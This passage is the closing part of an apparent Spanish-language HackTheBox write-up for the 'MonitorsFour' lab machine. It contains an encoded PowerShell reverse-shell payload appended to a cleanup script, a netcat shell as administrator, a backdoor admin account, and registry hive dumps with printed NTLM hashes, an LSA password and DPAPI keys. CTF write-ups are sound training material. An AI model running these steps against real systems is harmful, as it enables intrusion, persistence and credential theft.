AGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

/mnt/Users/administrator/documents # cat exploit.ps1 >> container_cleanup.ps1
/mnt/Users/administrator/documents # 

Luego de varios segundos se ejecuto y logramos una shell como administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


❯ rlwrap nc -lvp 5555
listening on [any] 5555 ...
connect to [10.10.14.26] from monitorsfour.htb [10.129.45.249] 61441

PS C:\WINDOWS\system32> whoami
monitorsfour\administrator
PS C:\WINDOWS\system32> cd C:/users/administrator/desktop
PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                 LastWriteTime         Length Name                                            
----                 -------------         ------ ----                                            
-ar---         12/6/2025   2:31 PM             34 root.txt                                        


PS C:\users\administrator\desktop> cat root.txt
9ab22c7d0b315b476d2a05261b414a0d
PS C:\users\administrator\desktop>

Dump Hashes

Creamos un usuario y lo agregamos al grupo Administrators y Remote Management Users.

1
2
3
4


$Password = ConvertTo-SecureString "StrongPassword123!" -AsPlainText -Force
New-LocalUser -Name "sckull" -Password $Password
Add-LocalGroupMember -Group "Administrators" -Member "sckull"
Add-LocalGroupMember -Group "Remote Management Users" -Member "sckull"

Verificamos los grupos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


PS C:\> net user sckull
User name                    sckull
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/6/2025 11:58:51 PM
Password expires             1/17/2026 11:58:51 PM
Password changeable          12/6/2025 11:58:51 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *None                 
The command completed successfully.

PS C:\>

evil-winrm-py nos permitio el acceso a la maquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42


❯ evil-winrm-py -u sckull -p 'StrongPassword123!' -i monitorsfour.htb
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.5.0

[*] Connecting to 'monitorsfour.htb:5985' as 'sckull'
evil-winrm-py PS C:\Users\sckull\Documents> whoami
monitorsfour\sckull
evil-winrm-py PS C:\Users\sckull\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
evil-winrm-py PS C:\Users\sckull\Documents>

Realizamos una copia de SYSTEM, SECURITY y SAM.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


evil-winrm-py PS C:\Users\sckull\Documents> reg save HKLM\SYSTEM SYSTEM
The operation completed successfully.

evil-winrm-py PS C:\Users\sckull\Documents> reg save HKLM\SECURITY SECURITY
The operation completed successfully.

evil-winrm-py PS C:\Users\sckull\Documents> reg save HKLM\SAM SAM
The operation completed successfully.

evil-winrm-py PS C:\Users\sckull\Documents> download SAM SAM
Downloading C:\Users\sckull\Documents\SAM: 128kB [00:00, 710MB/s]                                                                                                                       
[+] File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SAM
evil-winrm-py PS C:\Users\sckull\Documents> download SECURITY SECURITY
Downloading C:\Users\sckull\Documents\SECURITY: 64.0kB [00:00, 477MB/s]                                                                                                                 
[+] File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SECURITY
evil-winrm-py PS C:\Users\sckull\Documents> download SYSTEM SYSTEM
Downloading C:\Users\sckull\Documents\SYSTEM: 16.9MB [00:14, 1.22MB/s]                                                                                                                  
[+] File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SYSTEM
evil-winrm-py PS C:\Users\sckull\Documents>

Localmente obtuvimos los hashes de todos los usuarios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


❯ impacket-secretsdump -system SYSTEM -security SECURITY -sam SAM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:41f4136faf5a06a6765a8fcea8870225:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
marcus:1001:aad3b435b51404eeaad3b435b51404ee:a42896a092c80b3383da80bc3c400330:::
sckull:1002:aad3b435b51404eeaad3b435b51404ee:ccad9cd271d517d14d1950b6a317ba1e:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):817mkh27zdp6!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x48249fb0f4cf23ecbef54affc2b21d65717bf7df
dpapi_userkey:0xb8820f0412fc851cca8aa426248e7f37af5dd0b2
[*] NL$KM 
 0000   FA 36 C7 D5 C0 82 AB B5  78 E1 17 F0 5E 36 13 5B   .6......x...^6.[
 0010   A5 9F C0 9C 38 A8 C4 34  FE 20 F7 2B D9 A2 8C AF   ....8..4. .+....
 0020   71 F2 E0 D2 09 A1 EC 09  EB DE 9B 8C F5 4A E6 2D   q............J.-
 0030   6B 1D 32 16 A2 ED B4 AE  F1 51 AE 5B 41 E5 4E B6   k.2......Q.[A.N.
NL$KM:fa36c7d5c082abb578e117f05e36135ba59fc09c38a8c434fe20f72bd9a28caf71f2e0d209a1ec09ebde9b8cf54ae62d6b1d3216a2edb4aef151ae5b41e54eb6
[*] Cleaning up... 
❯

HackTheBox - MonitorsFour

Recon

nmap

Web Site

Directory Brute Forcing

Views

Subdomain Discovery

API - Website

Crack The Hash

Admin

Cacti

Password Spraying

User - www-data (Docker)

CVE-2025-24367

Shell

root via CVE-2025-9074 (Docker)

Port Forwarding

CVE-2025-9074

User - Administrator

Dump Hashes

HackTheBox - MonitorsFour

HackTheBox - MonitorsFour

Recon

nmap

Web Site

Directory Brute Forcing

Views

Subdomain Discovery

API - Website

Crack The Hash

Admin

Cacti

Password Spraying

User - www-data (Docker)

CVE-2025-24367

Shell

root via CVE-2025-9074 (Docker)

Port Forwarding

CVE-2025-9074

User - Administrator

Dump Hashes

Read other posts

HackTheBox - MonitorsFour